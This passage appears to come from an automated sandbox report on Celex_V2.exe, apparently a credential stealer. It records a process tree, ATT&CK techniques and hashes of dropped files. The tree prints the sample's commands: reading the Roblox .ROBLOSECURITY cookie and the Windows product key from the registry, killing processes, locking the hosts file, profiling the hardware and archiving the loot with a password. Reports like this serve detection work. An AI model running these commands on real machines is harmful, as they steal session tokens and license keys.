                                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                      4⤵
                                                                      • Drops file in Drivers directory
                                                                      • Views/modifies file attributes
                                                                      PID:1992
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    3⤵
                                                                      PID:1488
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        tasklist /FO LIST
                                                                        4⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:4204
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4068"
                                                                      3⤵
                                                                        PID:4824
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /F /PID 4068
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:3608
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4068"
                                                                        3⤵
                                                                          PID:1848
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /F /PID 4068
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            PID:4604
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 224"
                                                                          3⤵
                                                                            PID:4260
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /F /PID 224
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              PID:2128
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 224"
                                                                            3⤵
                                                                              PID:3704
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /F /PID 224
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:1204
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5076"
                                                                              3⤵
                                                                                PID:1652
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  taskkill /F /PID 5076
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:768
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5076"
                                                                                3⤵
                                                                                  PID:1488
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /F /PID 5076
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4996
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2284"
                                                                                  3⤵
                                                                                    PID:4716
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /F /PID 2284
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:820
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2284"
                                                                                    3⤵
                                                                                      PID:412
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /F /PID 2284
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4436
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3736"
                                                                                      3⤵
                                                                                        PID:3308
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /F /PID 3736
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:4016
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3736"
                                                                                        3⤵
                                                                                          PID:4176
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            4⤵
                                                                                              PID:1540
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /F /PID 3736
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4336
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4080"
                                                                                            3⤵
                                                                                              PID:3876
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /F /PID 4080
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:5060
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4080"
                                                                                              3⤵
                                                                                                PID:1644
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  taskkill /F /PID 4080
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:3524
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3540"
                                                                                                3⤵
                                                                                                  PID:1604
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    4⤵
                                                                                                      PID:656
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /F /PID 3540
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:2816
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3540"
                                                                                                    3⤵
                                                                                                      PID:1664
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        taskkill /F /PID 3540
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:2196
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3420"
                                                                                                      3⤵
                                                                                                        PID:2176
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          4⤵
                                                                                                            PID:4996
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /F /PID 3420
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:4324
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3420"
                                                                                                          3⤵
                                                                                                            PID:1036
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              taskkill /F /PID 3420
                                                                                                              4⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:2560
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                            3⤵
                                                                                                              PID:4332
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                4⤵
                                                                                                                  PID:4444
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                  4⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4988
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                3⤵
                                                                                                                  PID:396
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    4⤵
                                                                                                                      PID:4308
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                      4⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1068
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI15322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\jHYee.zip" *"
                                                                                                                    3⤵
                                                                                                                      PID:1008
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        4⤵
                                                                                                                          PID:4260
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI15322\rar.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI15322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\jHYee.zip" *
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4744
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                        3⤵
                                                                                                                          PID:4464
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic os get Caption
                                                                                                                            4⤵
                                                                                                                              PID:3104
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                            3⤵
                                                                                                                              PID:688
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                4⤵
                                                                                                                                  PID:1664
                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                  wmic computersystem get totalphysicalmemory
                                                                                                                                  4⤵
                                                                                                                                    PID:820
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                  3⤵
                                                                                                                                    PID:2008
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic csproduct get uuid
                                                                                                                                      4⤵
                                                                                                                                        PID:3080
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                      3⤵
                                                                                                                                        PID:780
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:3192
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                        3⤵
                                                                                                                                          PID:4548
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic path win32_VideoController get name
                                                                                                                                            4⤵
                                                                                                                                            • Detects videocard installed
                                                                                                                                            PID:3756
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                          3⤵
                                                                                                                                            PID:1176
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:2696
                                                                                                                                      • C:\Users\Admin\Downloads\Celex_V2.exe
                                                                                                                                        "C:\Users\Admin\Downloads\Celex_V2.exe"
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4716
                                                                                                                                        • C:\Users\Admin\Downloads\Celex_V2.exe
                                                                                                                                          "C:\Users\Admin\Downloads\Celex_V2.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:3324
                                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:388
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:4164
                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:1344
                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.0.2122402415\1998944413" -parentBuildID 20230214051806 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f65f6ea3-1cb3-41e5-ac90-d43b2c048590} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 1864 29e3af2da58 gpu
                                                                                                                                              3⤵
                                                                                                                                                PID:2464
                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.1.999818692\381345347" -parentBuildID 20230214051806 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e02fbd1b-dd18-4769-8b2b-972a36358887} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 2388 29e2e28a258 socket
                                                                                                                                                3⤵
                                                                                                                                                  PID:4092
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.2.641061995\251759169" -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 2960 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {681ad6c9-f06d-48d0-a8b2-0e13069d8088} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 2632 29e3dbdcf58 tab
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4600
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.3.1561968786\872375227" -childID 2 -isForBrowser -prefsHandle 3488 -prefMapHandle 3588 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09b7b066-ff2a-4741-84b9-34d910b970c2} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 3604 29e40930a58 tab
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4680
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.4.1887006813\1727127531" -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 5028 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ceec414c-4fe9-4d42-9ee3-80962ecc3202} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 5156 29e41884f58 tab
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2848
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.5.364938786\490838896" -childID 4 -isForBrowser -prefsHandle 5292 -prefMapHandle 5296 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7173157-6c12-4a84-bdba-da0072e46d12} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 5284 29e41885858 tab
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3460
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1344.6.1112079270\692534895" -childID 5 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdaadf0a-bbfb-4fe7-ba86-4594df02e0e1} 1344 "\\.\pipe\gecko-crash-server-pipe.1344" 5472 29e42e99158 tab
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2984

                                                                                                                                                      Network

                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                      Execution

                                                                                                                                                      Command and Scripting Interpreter

                                                                                                                                                      1
                                                                                                                                                      T1059

                                                                                                                                                      PowerShell

                                                                                                                                                      1
                                                                                                                                                      T1059.001

                                                                                                                                                      Defense Evasion

                                                                                                                                                      Hide Artifacts

                                                                                                                                                      1
                                                                                                                                                      T1564

                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                      1
                                                                                                                                                      T1564.001

                                                                                                                                                      Credential Access

                                                                                                                                                      Unsecured Credentials

                                                                                                                                                      2
                                                                                                                                                      T1552

                                                                                                                                                      Credentials In Files

                                                                                                                                                      2
                                                                                                                                                      T1552.001

                                                                                                                                                      Discovery

                                                                                                                                                      System Information Discovery

                                                                                                                                                      4
                                                                                                                                                      T1082

                                                                                                                                                      Query Registry

                                                                                                                                                      3
                                                                                                                                                      T1012

                                                                                                                                                      Process Discovery

                                                                                                                                                      1
                                                                                                                                                      T1057

                                                                                                                                                      Collection

                                                                                                                                                      Data from Local System

                                                                                                                                                      2
                                                                                                                                                      T1005

                                                                                                                                                      Command and Control

                                                                                                                                                      Web Service

                                                                                                                                                      1
                                                                                                                                                      T1102

                                                                                                                                                      Replay Monitor

                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                      Downloads

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                        Filesize

                                                                                                                                                        2KB

                                                                                                                                                        MD5

                                                                                                                                                        627073ee3ca9676911bee35548eff2b8

                                                                                                                                                        SHA1

                                                                                                                                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                                        SHA256

                                                                                                                                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                                        SHA512

                                                                                                                                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                        Filesize

                                                                                                                                                        152B

                                                                                                                                                        MD5

                                                                                                                                                        6876cbd342d4d6b236f44f52c50f780f

                                                                                                                                                        SHA1

                                                                                                                                                        a215cf6a499bfb67a3266d211844ec4c82128d83

                                                                                                                                                        SHA256

                                                                                                                                                        ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e

                                                                                                                                                        SHA512

                                                                                                                                                        dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                        Filesize

                                                                                                                                                        152B

                                                                                                                                                        MD5

                                                                                                                                                        c1c7e2f451eb3836d23007799bc21d5f

                                                                                                                                                        SHA1

                                                                                                                                                        11a25f6055210aa7f99d77346b0d4f1dc123ce79

                                                                                                                                                        SHA256

                                                                                                                                                        429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800

                                                                                                                                                        SHA512

                                                                                                                                                        2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                        Filesize

                                                                                                                                                        5KB

                                                                                                                                                        MD5

                                                                                                                                                        16bf95763d47da0dd4a0a01956912c6a

                                                                                                                                                        SHA1

                                                                                                                                                        2cd9add95a6e40376f25db280ca9d857bea5dbef

                                                                                                                                                        SHA256

                                                                                                                                                        7e1592a394b538b6ea523a62d5b6ae59824bbdb19ba09fb7b75816337467f708

                                                                                                                                                        SHA512

                                                                                                                                                        e0137920dc1d52ec00fe44b6cc0fa4c2c06fe7f748b98ddc6faac65925aa0cf6916eef17bc73bd36948c4f8fe97ba494e945fee997803e9c649f033a5537364d

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                        Filesize

                                                                                                                                                        5KB

                                                                                                                                                        MD5

                                                                                                                                                        38bad42ffe0a47868ae06c5d57da6f92

                                                                                                                                                        SHA1

                                                                                                                                                        13bc2636f53e778807e00a8aaac1402024c17261

                                                                                                                                                        SHA256

                                                                                                                                                        a957190149a4f64cb2ed099c4b55b70bd34c2b0e171e5e46ad22a6d4ef21cb3d

                                                                                                                                                        SHA512

                                                                                                                                                        1995e02a488655503ecbff3235ba232483c6e227a5cf9c6277e1b7718e5bac7d9854fe8b9e367015098d6a4462141f997ba0fceae3fe8b401ca68225635b9fdb

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                                        Filesize

                                                                                                                                                        16B

                                                                                                                                                        MD5

                                                                                                                                                        46295cac801e5d4857d09837238a6394

                                                                                                                                                        SHA1

                                                                                                                                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                        SHA256

                                                                                                                                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                        SHA512

                                                                                                                                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                                        Filesize

                                                                                                                                                        16B

                                                                                                                                                        MD5

                                                                                                                                                        206702161f94c5cd39fadd03f4014d98

                                                                                                                                                        SHA1

                                                                                                                                                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                        SHA256

                                                                                                                                                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                        SHA512

                                                                                                                                                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                        Filesize

                                                                                                                                                        11KB

                                                                                                                                                        MD5

                                                                                                                                                        b9cdeccd61ad42d87d5e99a21b47c02b

                                                                                                                                                        SHA1

                                                                                                                                                        b18d28235303544337e5ebed44c7a0820312e778

                                                                                                                                                        SHA256

                                                                                                                                                        7a6788992b9dc9f4a10f72a6d91ed1be5658251ed7dfced407ca28c82587bb62

                                                                                                                                                        SHA512

                                                                                                                                                        2d11988b278d7b18ed8db2532c7e2ff6fe412610e8d127dc4db35236c554d58091e02260a79e11334e9820c903b237b583758f7b06fe017f77a4ffdf64a6c0c1

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                        Filesize

                                                                                                                                                        11KB

                                                                                                                                                        MD5

                                                                                                                                                        d38f4d9dc6f874145c51b3f518ba7dc4

                                                                                                                                                        SHA1

                                                                                                                                                        7411ee99d9e6f14adae31e1d2425410271da4caa

                                                                                                                                                        SHA256

                                                                                                                                                        b9c03748b6228e9ec80d284d6d9406fa89c065223e908f040a11a55ac4132526

                                                                                                                                                        SHA512

                                                                                                                                                        73f3f3c175850a765003140c7ad6c13b9650023558644f05a2fcaa9b6a292d580ff93a58a9310b18f0575eea7d6c06401ee5dd547ac67d240447925f7ca83d09

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                        Filesize

                                                                                                                                                        944B

                                                                                                                                                        MD5

                                                                                                                                                        6903d57eed54e89b68ebb957928d1b99

                                                                                                                                                        SHA1

                                                                                                                                                        fade011fbf2e4bc044d41e380cf70bd6a9f73212

                                                                                                                                                        SHA256

                                                                                                                                                        36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

                                                                                                                                                        SHA512

                                                                                                                                                        c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                        Filesize

                                                                                                                                                        1KB

                                                                                                                                                        MD5

                                                                                                                                                        8d5a968a363b584c602b34105d75d60f

                                                                                                                                                        SHA1

                                                                                                                                                        f6c728551d41ef1a6d1131bf93e52393175c4f4c

                                                                                                                                                        SHA256

                                                                                                                                                        48ea6b7df7a08593d091865088a847c0510a029718c2af51ef7c3857b8a2ff83

                                                                                                                                                        SHA512

                                                                                                                                                        198c628caf22fbbebb25b557668d6e1a2859fb9046640d31ea207a9e4304e8573ac72b13e1673a60a09b569f73d6a68a4d44cb873a4a5226d4d77344d6ac95bf

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\activity-stream.discovery_stream.json.tmp
                                                                                                                                                        Filesize

                                                                                                                                                        27KB

                                                                                                                                                        MD5

                                                                                                                                                        d2f37e2d5450ad983918e2b51da0d5d1

                                                                                                                                                        SHA1

                                                                                                                                                        d1796c10536b2f5f4cfc350958f335816f57db01

                                                                                                                                                        SHA256

                                                                                                                                                        cf10c37b8d03fb729df73bfa07a3188b0ce9b38b4d91fccc7adab1f45af7e4a5

                                                                                                                                                        SHA512

                                                                                                                                                        8fef04938f993c660bd9e611e7120849d264806ec1b26d848d294e2813ed61a174b9eb5d9854dcb00787f3d268c36e48a76b52d0e86aa15b9e3d4dbd90040704

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649
                                                                                                                                                        Filesize

                                                                                                                                                        13KB

                                                                                                                                                        MD5

                                                                                                                                                        fc5def9477e92f8b5becc5ccee8737cf

                                                                                                                                                        SHA1

                                                                                                                                                        271449405e4ee288aa52b6555b32770319876488

                                                                                                                                                        SHA256

                                                                                                                                                        d236ddeaadfb5d5f86144f63f102ee4f191e165e3fb500ee8871ae7bec8ca579

                                                                                                                                                        SHA512

                                                                                                                                                        5dad8c9ed21a4a56fd918b5d84a0783ec10808a37b9ae5e7f569210d805e05a6b5f754dfa2c264a81e4e3db106ddb63f84db7358beb851b67b82c3be06fc9256

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308
                                                                                                                                                        Filesize

                                                                                                                                                        9KB

                                                                                                                                                        MD5

                                                                                                                                                        193c9601c4001ab99224b78db187839a

                                                                                                                                                        SHA1

                                                                                                                                                        c089da9f6532d53ba8a4eb59052ab45789ce0397

                                                                                                                                                        SHA256

                                                                                                                                                        4b7a3ae4f95b1300e615b83d4268ac73a71b6e5684c95c29154055a59a41248a

                                                                                                                                                        SHA512

                                                                                                                                                        901c9faef52adf3c3ab41d07fdd521346770c1b583f5405be2e5021792530d4d3e616235aacd50e804116f505bee6168479d81556204f8343960b0296734e5ac

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
                                                                                                                                                        Filesize

                                                                                                                                                        10KB

                                                                                                                                                        MD5

